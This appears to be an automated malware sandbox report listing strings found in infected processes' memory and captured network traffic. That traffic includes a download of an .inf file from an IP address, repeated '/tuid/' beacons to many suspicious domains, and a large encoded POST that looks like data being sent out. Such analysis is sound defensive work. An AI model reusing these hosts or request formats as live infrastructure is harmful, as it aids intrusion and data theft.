Source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: rundll32.exe, 00000017.00000002.6881342106.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001A.00000002.4063207081.0000000003180000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001A.00000002.4063366800.000000000318A000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001A.00000003.4061182322.00000000031AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: rundll32.exe, 00000017.00000002.6881342106.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001A.00000002.4063366800.000000000318A000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001A.00000003.4061182322.00000000031AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: cmd.exe, 0000001A.00000002.4063366800.000000000318A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: rundll32.exe, 00000017.00000002.6881342106.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001A.00000002.4063366800.000000000318A000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001A.00000003.4061182322.00000000031AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://mssql.active24.com/
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://mysql.active24.com/
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000016.00000000.3071520178.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3196886291.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3344684844.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2932835606.0000000009B94000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com:
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.come
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://webftp.active24.com/
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://webmail.active24.com/
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 00000016.00000000.3224363499.000000000DBC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2973981564.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3113624581.000000000DBC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3371795782.000000000DBC9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/cssc/a21/main.less?v=b0266c48432540148d77fe7f70991539
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/dnssec
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/domeny
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/domeny#m-certifikace
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/jak-na-tvorbu-webu
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/klientska-zona/zakaznicka-podpora
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/kariera
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/kontakty
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/media
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/obchodni-podminky
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/o-spolecnosti/rikaji-o-nas-zakaznici
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/objednavka/login
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/spoluprace
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/upozorneni
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/webforward-mailforward
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/weby/mojestranky
Source: explorer.exe, 00000016.00000000.2955017038.000000000D50D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3358987218.000000000D518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3211223410.000000000D518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2979739268.0000000010BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3094084292.000000000D50D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/uk-climate-activists-face-prison-for-blocking-highz
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.superstranka.cz/
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.vtubber.com/tuid/?m4bd=vE0t2WxjBi8H4KsoCXQPFaaEcnaL0cW4rsHN0mKSQSi6rgkDy1GsjEniIX065GWyc
Source: unknown HTTP traffic detected: POST /tuid/ HTTP/1.1Host: www.muziclips.comConnection: closeContent-Length: 174830Cache-Control: no-cacheOrigin: http://www.muziclips.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.muziclips.com/tuid/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6d 34 62 64 3d 76 59 38 70 54 65 32 6c 67 48 69 38 28 65 67 43 57 6e 33 75 49 37 39 5f 76 35 6f 49 4b 43 4a 63 77 49 55 46 38 77 63 67 4d 44 43 53 35 46 52 52 79 39 44 57 42 69 31 42 75 4f 4e 59 7a 52 63 37 77 50 44 69 6f 74 35 36 5a 67 71 6f 68 47 30 42 65 62 50 55 62 5f 44 72 78 4b 52 52 49 33 66 79 52 56 70 75 50 68 45 78 6b 6b 58 45 4b 6b 70 65 72 70 78 32 7a 74 28 71 51 5f 73 73 43 79 37 70 6d 4e 42 44 77 30 51 5a 4c 32 4f 6e 56 53 47 43 57 53 58 44 6c 51 56 75 72 57 70 62 51 52 6c 41 70 79 57 67 62 31 62 67 74 74 7a 35 6c 52 32 4b 44 6b 62 64 4b 57 47 70 51 2d 6c 66 66 7a 6d 48 4a 59 76 64 5a 6d 4b 4b 54 58 53 4d 6e 79 44 46 43 38 74 53 38 37 4a 4b 66 34 45 75 32 56 77 2d 54 31 62 72 68 53 6c 64 48 4f 59 6f 66 4d 67 64 75 63 42 6b 65 62 31 48 53 52 53 4c 74 31 47 69 51 34 49 6c 7a 69 35 61 71 37 54 67 45 56 50 54 42 56 70 45 31 56 77 61 58 77 48 6f 6c 49 38 68 57 71 62 50 70 70 53 75 64 64 4f 30 7a 58 41 53 66 63 43 67 28 68 58 56 4a 64 41 4c 6b 32 6c 4f 66 71 4a 34 70 52 30 57 56 46 59 45 36 51 5a 6c 38 74 58 6c 4b 41 35 79 61 6b 30 64 64 74 4e 38 4c 72 4e 34 73 32 38 39 6f 6b 37 59 61 49 35 31 44 68 6c 50 56 6d 6e 6b 51 48 45 4b 4b 6f 78 63 66 69 39 72 78 6b 54 48 4d 6a 4c 68 42 53 48 6a 33 69 6d 46 28 30 46 75 77 75 4a 6c 37 65 58 72 36 59 37 5a 59 69 68 64 78 56 53 51 35 43 43 48 45 37 58 4c 66 58 34 46 59 59 5a 30 47 4a 71 35 6b 33 44 4a 64 53 77 7a 4c 38 6f 4e 5a 76 65 35 5a 74 31 30 4a 65 32 55 59 67 76 47 33 6b 4c 61 54 58 28 39 46 51 75 75 77 52 72 4c 79 50 57 4e 43 6b 44 2d 71 56 46 75 65 6c 50 50 5a 30 50 79 48 59 30 62 41 73 33 4d 59 50 39 54 51 6b 5a 7a 37 6e 79 50 65 33 44 33 34 58 76 4a 6f 77 47 70 73 4e 44 77 47 6d 70 6e 61 35 57 30 47 44 4d 79 4e 59 65 6c 52 63 45 67 37 35 45 39 63 2d 56 53 35 69 42 58 33 41 6b 30 7e 51 78 44 79 5f 41 4d 63 73 36 43 30 78 44 71 39 37 77 33 46 33 49 38 35 61 79 4d 66 58 5a 50 38 43 75 48 39 66 39 56 6c 71 52 61 66 77 59 6b 59 34 73 48 51 78 61 52 54 42 65 79 6b 78 70 6a 57 76 74 6c 4c 4b 76 68 6d 72 31 51 6f 77 54 64 77 6f 78 79 7e 49 47 4e 30 56 42 55 6e 76 49 79 51 70 6c 6a 6e 64 6c 62 33 54 4b 64 56 77 4b 7a 70 35 4f 4c 72 57 78 67 38 69 59 6b 75 64 6e 51 75 42 30 48 4c 38 61 65 61 34 53 4b 54 4b 47 30 7a 6d 79 57 32 32 52 66 79 68 30 41 56 4d 48 45 7a 47 6a 57 4c 4a 42 61 68 66 58 48 37 37 4d 66 30 4e 67 2d 6d 66 4a 62 64 6d 73 6c 75 6c 6b 44 53 4c 62 79 64 43 35 64 71 76 32 76 73 72 35 56 61 38 57 37 70 50 62 4e 74 58 68 34 77 57 31 4f 7a 35 62 62 6f 72 6d 61 50 45 4f 77 46 43 59 55 49 77 66 58 75 74 79 34 43 78 78 55 6b 74 4e 72 77 4b 77 63 36 7a 6b 5a 6b 55 7e 72 73 6b 59 68 6d 78 70 34
Source: unknown DNS traffic detected: queries for: www.maximilianvonah.com
Source: global traffic HTTP traffic detected: GET /WHvBvQsIuWdD218.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.169Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=csUEPuyljQauctU/Z8NbC9ms5fC6XWDYEeq9yCIh8wbky0EJAlqn2MT949GlS8zP8lU0&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.maximilianvonah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=83varyKolJl8CknPQYlgcSGzNVcyrkZOB+D5ZpiMClZzhWRqo67UpTDjwxWvk8XKYz02 HTTP/1.1Host: www.emitacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=uDqjMC0TPYTc8b3BnUYVD5r+dOFIeilgQYFIqhS/31oxMeb2xRi82/WbnXFAxC3dxs3o HTTP/1.1Host: www.linuxizes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=gaITN7i6/i636J8ZdAepXbFiroAuKTRwrMdc4y4CfBKs7kJVyv+3PWgk2/xmwUEu5s/a&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.muziclips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW HTTP/1.1Host: www.ghanesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=Il3LuUn17XOwO1L66Bn3hjajRgSpI6QuPLSUULkpfr+VyFXt3qGq+SpnJy79y37sHeXr HTTP/1.1Host: www.worldbrands.wineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.secureartist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv HTTP/1.1Host: www.ymsb.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.coolarts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=ZWTx79zL1WMN2pQcyBYApaV2+B3RRlV7SjHEUZJPfkwT7h+aiOtTufuSzn8LCa71qLhI HTTP/1.1Host: www.ap-render.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.receiveprim.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb HTTP/1.1Host: www.itsfindia.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=p0pyYx380zTi+CiqScB4rLgyoRdRZyFFdRM5Rh8HyCuUL1S9LlJi1JnCbSa7CQi/RAeh&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.svgjp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=Xot5lTp2K0ClnYt2dL3qfCxcaVN+/32Qk6xa6/2CoOF7guyvNDwTfZphG6kmH2ULd7pQ&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.147bronzeway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=uDqjMC0TPYTc8b3BnUYVD5r+dOFIeilgQYFIqhS/31oxMeb2xRi82/WbnXFAxC3dxs3o HTTP/1.1Host: www.linuxizes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.ghanesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=HIOGqwzZ3Isl7OEwvKn7zxoCIrzNSH0uht2lzyEyFHfgP4651xyJdMCZXys0BRyGrE8f&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.wwwf2dni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=Il3LuUn17XOwO1L66Bn3hjajRgSpI6QuPLSUULkpfr+VyFXt3qGq+SpnJy79y37sHeXr HTTP/1.1Host: www.worldbrands.wineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.secureartist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv HTTP/1.1Host: www.ymsb.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.coolarts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=ZWTx79zL1WMN2pQcyBYApaV2+B3RRlV7SjHEUZJPfkwT7h+aiOtTufuSzn8LCa71qLhI HTTP/1.1Host: www.ap-render.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.receiveprim.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb HTTP/1.1Host: www.itsfindia.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=Sp+Vnoj41xF+X27kbZ2gbhhmlpTYO/ymXHQnMWpJpfoG8qqLVUKSMWMbMwd5uBvOkHI+&APPTx=9r9PSR HTTP/1.1Host: www.blueonb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=WEOQpGNSR38PhgWGQI/4C8NMlFMwGI3qKGQVHk5AxuPmXhsKWgjXW9kcijjoxdm/j8Qu&APPTx=9r9PSR HTTP/1.1Host: www.mojawapo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW&APPTx=9r9PSR HTTP/1.1Host: www.ghanesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=uDqjMC0TPYTc8b3BnUYVD5r+dOFIeilgQYFIqhS/31oxMeb2xRi82/WbnXFAxC3dxs3o HTTP/1.1Host: www.linuxizes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&APPTx=9r9PSR HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=mHFj8MSWDx8nkU1eAV++NnKhhWbL51TVGCJDIAbvrDEUS4qoSy90C4E1UO2kwJf1rSvR&APPTx=9r9PSR HTTP/1.1Host: www.hikingtaibah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=vocXnNkofrtqV2skOi0toh6MZkzBPgY3NaQb1h7517U8PmTkl0G2bMX+HFjiIYqpZAQ5&APPTx=9r9PSR HTTP/1.1Host: www.xc8b49c6mnmdts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=Il3LuUn17XOwO1L66Bn3hjajRgSpI6QuPLSUULkpfr+VyFXt3qGq+SpnJy79y37sHeXr HTTP/1.1Host: www.worldbrands.wineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.secureartist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv HTTP/1.1Host: www.ymsb.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.coolarts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=ZWTx79zL1WMN2pQcyBYApaV2+B3RRlV7SjHEUZJPfkwT7h+aiOtTufuSzn8LCa71qLhI HTTP/1.1Host: www.ap-render.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
